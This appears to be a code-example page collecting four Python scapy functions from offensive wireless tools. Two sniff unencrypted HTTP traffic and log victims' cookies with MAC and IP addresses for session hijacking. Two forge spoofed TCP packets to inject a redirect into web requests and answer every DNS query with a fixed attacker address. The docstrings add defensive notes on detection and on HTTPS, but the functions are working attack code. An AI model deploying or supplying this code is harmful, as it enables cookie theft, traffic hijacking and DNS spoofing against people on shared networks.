예제 #1
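def process(pkt):
    """Log every cookie carried by a sniffed cleartext HTTP request.

    A packet is considered only when it has TCP and Raw layers and its raw
    payload starts with ``"POST "`` or ``"GET "``.  That restricts this to
    unencrypted HTTP: requests sent over TLS never match, and browsers do not
    send cookies marked ``Secure`` over plain HTTP.

    For each ``name=value`` pair of the Cookie header, ``db_insert`` receives
    one row: source MAC, host, cookie name, cookie value, request URL, user
    agent and source IP.  A cookie token without ``=`` is stored as a name
    with an empty value; blank tokens are skipped.

    Args:
        pkt: A captured scapy packet.
    """
    if not (pkt.haslayer(TCP) and pkt.haslayer(Raw)):
        return
    tcpdata = pkt.getlayer(Raw).load
    if not (tcpdata.startswith("POST ") or tcpdata.startswith("GET ")):
        return

    # The capture may have no Ethernet header (e.g. a non-Ethernet link type).
    ether_src = 'None_observed'
    if pkt.haslayer(Ether):
        ether_src = pkt.getlayer(Ether).src

    def _joined(parts):
        # The helper parsers may return None, which is treated as "header
        # absent"; otherwise the result is joined into one string
        # (presumably a sequence of string fragments -- confirm in helper).
        return '' if parts is None else ''.join(parts)

    cookie = _joined(helper.getcookie(tcpdata))
    host = _joined(helper.gethost(tcpdata))
    # Every field gets the same None -> '' fallback, so db_insert never
    # receives None for the user agent when that header is missing.
    useragent = _joined(helper.getuseragent(tcpdata))
    address = _joined(helper.getdsturl(tcpdata))

    # NOTE(review): an IP layer is assumed here; getlayer(IP) yields None for
    # e.g. IPv6 traffic and ``.src`` would then raise AttributeError.
    ip_src = pkt.getlayer(IP).src

    for name_val in cookie.split(';'):
        # partition() keeps the whole token as the name when '=' is missing;
        # slicing on find() == -1 would silently drop the last character.
        name, _, val = name_val.partition('=')
        name = name.strip()
        val = val.strip()
        if not name and not val:
            continue
        # One row per cookie pair: the insert belongs inside the loop,
        # otherwise only the last pair of the header is stored.
        db_insert(ether_src, host, name, val, address, useragent, ip_src)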
예제 #2
파일: firelamb.py 프로젝트: WireGhost/mana
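def process(pkt):
    """Store the cookies seen in one sniffed plaintext HTTP request.

    Only packets with TCP and Raw layers whose payload begins with
    ``"POST "`` or ``"GET "`` are handled, i.e. unencrypted HTTP requests.
    Traffic inside TLS never matches this test, and cookies flagged
    ``Secure`` are not sent by browsers on plain-HTTP connections.

    ``db_insert`` is called once per ``name=value`` pair of the Cookie
    header with: source MAC, host, cookie name, cookie value, request URL,
    user agent, source IP.  A token without ``=`` becomes a name with an
    empty value; empty tokens are ignored.

    Args:
        pkt: A captured scapy packet.
    """
    # Indentation is uniform spaces: the loop nesting below must not depend
    # on how an interpreter or editor expands tabs.
    if not pkt.haslayer(TCP):
        return
    if not pkt.haslayer(Raw):
        return

    tcpdata = pkt.getlayer(Raw).load
    is_request = tcpdata.startswith("POST ") or tcpdata.startswith("GET ")
    if not is_request:
        return

    ether_src = 'None_observed'
    if pkt.haslayer(Ether):
        ether_src = pkt.getlayer(Ether).src

    cookie = helper.getcookie(tcpdata)
    host = helper.gethost(tcpdata)
    useragent = helper.getuseragent(tcpdata)
    address = helper.getdsturl(tcpdata)
    # NOTE(review): assumes an IP layer exists; for e.g. IPv6 packets
    # getlayer(IP) is None and ``.src`` raises AttributeError.
    ip_src = pkt.getlayer(IP).src

    # Each helper result may be None (treated as "header absent"); otherwise
    # it is joined into a single string (presumably a sequence of string
    # fragments -- confirm against helper).
    cookie = ''.join(cookie) if cookie is not None else ''
    host = ''.join(host) if host is not None else ''
    # The fallback must be bound to ``useragent`` itself; a misspelt target
    # name leaves None in the row when the User-Agent header is missing.
    useragent = ''.join(useragent) if useragent is not None else ''
    address = ''.join(address) if address is not None else ''

    if cookie == '':
        return

    for name_val in cookie.split(';'):
        # partition() avoids the find() == -1 case, where slicing would cut
        # the last character off a token that has no '='.
        name, _, val = name_val.partition('=')
        name, val = name.strip(), val.strip()
        if name == '' and val == '':
            continue
        db_insert(ether_src, host, name, val, address, useragent, ip_src)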
예제 #3
def pkt_callback(pkt):
    """Handle one captured packet and, in two cases, send a forged reply.

    Presumably used as a scapy sniff callback (the caller is not shown).

    The reply headers mirror the captured packet: layer-2 addresses (802.11
    or Ethernet), IP source/destination and TCP/UDP ports are swapped, so the
    reply appears to come from the host the sender was talking to.

    Packets are sent on ``interface`` only when:

    * a TCP segment with flags value 24 or 16 carries a payload starting with
      ``"GET "`` and the URL from ``helper.getdsturl`` contains none of a
      fixed list of substrings: a PSH/ACK segment carrying ``redirpkt`` and a
      FIN/ACK segment are sent, numbered from the captured segment's seq/ack;
    * a DNS message with ``qr == 0`` arrives over UDP: an answer for the
      queried name is sent with the fixed address 85.17.93.121 and TTL 10.

    Every other packet returns without sending.  ``redirpkt``, ``interface``
    and ``helper`` are names defined outside this function.

    Defensive note: both forgeries rely on the request being readable on the
    wire and the reply being unauthenticated, which is the exposure that
    HTTPS and authenticated or encrypted DNS remove.  The legitimate server's
    own reply typically still arrives, so two differing replies to a single
    request are a detection signal.

    Args:
        pkt: A captured scapy packet.
    """

    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # Reply 802.11 header: addr1/addr2 of the captured frame swapped,
        # addr3 kept, frame marked "from-DS", then LLC/SNAP encapsulation.
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(
            addr1=macl.addr2,
            addr2=macl.addr1,
            addr3=macl.addr3,
            FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # Reply Ethernet header: source and destination MAC swapped.
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst=macl.src, src=macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return

    if pkt.haslayer(scapy.IP):
        # Reply IP header: source and destination address swapped.
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return

    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # Reply TCP header: source and destination port swapped.
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)

        if tcpl.flags == 2:  # flags value 2 = SYN only; ignored
            return
        elif tcpl.flags == 24 or tcpl.flags == 16:  # 24 = PSH+ACK, 16 = ACK only
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                # Only a segment that begins an HTTP GET request is handled.
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")

                    dsturl = helper.getdsturl(tcpdata)

                    if dsturl is None:
                        return

                    print("IP: %s, DST URL: %s" %
                          (pkt.getlayer(scapy.IP).src, dsturl))

                    # Skip list: no reply is sent when the URL contains any of
                    # these substrings.  '0x0a' matches the host in the
                    # commented-out URL below and '85.17' the address used in
                    # the forged DNS answer.
                    if dsturl.find('0x0a') != -1 or dsturl.find(
                            '85.17') != -1 or dsturl.find(
                                'twitter') != -1 or dsturl.find(
                                    'facebook') != -1 or dsturl.find(
                                        'vk.com') != -1 or dsturl.find(
                                            'blogger') != -1 or dsturl.find(
                                                'odnoklassniki') != -1:
                        # Python 2 print statement: this function does not
                        # parse under Python 3.
                        print "inject success"
                        return

                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    # redirpkt is defined outside this function and is used
                    # unmodified as the reply payload.
                    credirpkt = redirpkt

                    # Data segment: seq continues from what the sender has
                    # acknowledged; ack covers the request bytes just seen.
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"

                    # FIN segment: copied before the payload is attached, so
                    # it carries none; its seq is advanced by the payload
                    # length so it follows the data segment.
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)

                    # Attach the payload to the data segment only.
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)

                    packetbasket = [pktreply, finpktreply]

                    # Send both frames at layer 2 on the configured interface.
                    scapy.sendp(packetbasket, verbose=0, iface=interface)
                    print("Reply sent")
            # Reached for every segment with flags 24 or 16, whether or not
            # a reply was sent.
            return

        elif tcpl.flags == 17:  # flags value 17 = FIN+ACK; ignored
            return

    elif pkt.haslayer(scapy.UDP):
        # Reply UDP header: source and destination port swapped.
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)

        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            # qr == 0 marks a query; the reply built below sets qr=1.
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))

                # The answer reuses the query id and question section and
                # returns the same fixed address for whatever name was asked.
                pktreply = l2 / l3 / l4 / scapy.DNS(
                    id=dnsl.id,
                    qr=1,
                    qd=dnsl.qd,
                    an=scapy.DNSRR(
                        rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose=0, iface=interface)
                print("Reply sent")
        return

    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return
예제 #4
파일: hijack.py 프로젝트: 0x0d/hijack
def pkt_callback(pkt):
    """Process one captured packet; forge a reply for HTTP GETs and DNS queries.

    Presumably registered as a scapy sniff callback (the caller is not shown).

    Reply headers are derived from the captured packet by swapping the
    layer-2 addresses (802.11 or Ethernet), the IP addresses and the TCP/UDP
    ports, which makes the reply look as if it came from the sender's peer.

    Frames are sent on ``interface`` in exactly two situations:

    * TCP flags value 24 or 16, payload starting with ``"GET "``, and a URL
      (from ``helper.getdsturl``) that contains none of a fixed list of
      substrings: a PSH/ACK segment with ``redirpkt`` as payload plus a
      FIN/ACK segment, numbered from the captured segment's seq/ack;
    * a DNS message over UDP with ``qr == 0``: an answer for the queried
      name carrying the fixed address 85.17.93.121 with TTL 10.

    All other packets return without sending.  ``redirpkt``, ``interface``
    and ``helper`` are defined outside this function.

    Defensive note: both replies can only be forged because the request is
    readable and the reply unauthenticated; HTTPS and authenticated or
    encrypted DNS close that gap.  The real server's reply typically arrives
    as well, so duplicate, conflicting replies to one request are a
    detection signal.

    Args:
        pkt: A captured scapy packet.
    """

    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # Reply 802.11 header: addr1/addr2 of the captured frame swapped,
        # addr3 kept, frame marked "from-DS", then LLC/SNAP encapsulation.
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(addr1 = macl.addr2, addr2 = macl.addr1, addr3 = macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # Reply Ethernet header: source and destination MAC swapped.
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst = macl.src, src = macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return

    if pkt.haslayer(scapy.IP):
        # Reply IP header: source and destination address swapped.
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src = ipl.dst, dst = ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return

    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # Reply TCP header: source and destination port swapped.
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport = tcpl.sport, sport = tcpl.dport)

        if tcpl.flags == 2: # flags value 2 = SYN only; ignored
            return
        elif tcpl.flags == 24 or tcpl.flags == 16: # 24 = PSH+ACK, 16 = ACK only
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                # Only a segment that begins an HTTP GET request is handled.
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")

                    dsturl = helper.getdsturl(tcpdata)

                    if dsturl is None:
                        return

                    print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl))

                    # Skip list: nothing is sent when the URL contains any of
                    # these substrings.  '0x0a' matches the host in the
                    # commented-out URL below and '85.17' the address used in
                    # the forged DNS answer.
                    if dsturl.find('0x0a') != -1 or dsturl.find('85.17') != -1 or dsturl.find('twitter') != -1 or dsturl.find('facebook') != -1 or dsturl.find('vk.com') != -1 or dsturl.find('blogger') != -1 or dsturl.find('odnoklassniki') != -1:
                        # Python 2 print statement: this function does not
                        # parse under Python 3.
                        print "inject success"
                        return

                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    # redirpkt is defined outside this function and is used
                    # unmodified as the reply payload.
                    credirpkt = redirpkt

                    # Data segment: seq continues from what the sender has
                    # acknowledged; ack covers the request bytes just seen.
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"

                    # FIN segment: copied before the payload is attached, so
                    # it carries none; its seq is advanced by the payload
                    # length so it follows the data segment.
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)

                    # Attach the payload to the data segment only.
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)

                    packetbasket = [pktreply, finpktreply]

                    # Send both frames at layer 2 on the configured interface.
                    scapy.sendp(packetbasket, verbose = 0, iface = interface)
                    print("Reply sent")
            # Reached for every segment with flags 24 or 16, whether or not
            # a reply was sent.
            return

        elif tcpl.flags == 17: # flags value 17 = FIN+ACK; ignored
            return

    elif pkt.haslayer(scapy.UDP):
        # Reply UDP header: source and destination port swapped.
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)

        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            # qr == 0 marks a query; the reply built below sets qr=1.
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))

                # The answer reuses the query id and question section and
                # returns the same fixed address for whatever name was asked.
                pktreply = l2 / l3 / l4 / scapy.DNS(id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR(rrname=dnsl.qd.qname, ttl = 10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose = 0, iface = interface)
                print("Reply sent")
        return

    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return